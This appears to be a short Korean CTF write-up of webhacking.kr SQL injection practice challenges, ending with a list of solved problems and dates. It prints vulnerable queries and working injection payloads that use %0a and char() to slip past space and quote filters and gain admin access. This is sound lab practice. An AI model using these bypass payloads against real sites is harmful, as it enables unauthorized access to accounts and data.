연습 또 연습.

쿼리 select id,cash from members where lv=$_GET[lv] lv=1만 반응한다. 곧+--------+-----+---+| id | cash | lv |+--------+-----+---+| zzibong | 10000 | 1 |+--------+-----+---+ id를 admin으로 만들어야하므로?lv=0 or id='admin' 공백은 %0a로, 쿼터는 char함수로 우회해준다. (0x도 필터링됨) ?lv=0%0aor%0aid=char(97,100,109,105,110)

쿼리select id from challenge18_table where id='guest' and no=$_GET[no] guest의 no값은 1이다. admin으로 로그인해아하는데 추정할 수 있는 table의 형태는 +-----+---+| id | no |+-----+---+| guest | 1 || admin | 2 |+-----+---+ no=0 or no=2를 주면 되는데 공백이 필터링된다 깔끔하게 %0a로 우회해준다. ?no=0%0aor%0ano=2

webhacking.kr SQL Injection 문제 3/28 시작 2 (500)7 (300) - 4/9 클리어8 (350) - 4/1 클리어9 (900) - 7/17 클리어13 (1000) - 8/22 클리어18 (100) - 3/28 클리어21 (250) - 3/28 클리어22 (500) - 8/23 클리어35 (350) - 3/31 클리어40 (500) - 3/31 클리어45 (550) - 4/3 클리어46 (300) - 3/28 클리어49 (300) - 3/28 클리어50 (450) - 3/29 클리어51 (250) - 4/3 클리어53 (350) - 3/31 클리어55 (400) - 4/9 클리어56 (250) - 3/31 클리어57 (600) - 4/3 클리어59 (200) - 7/8 클리어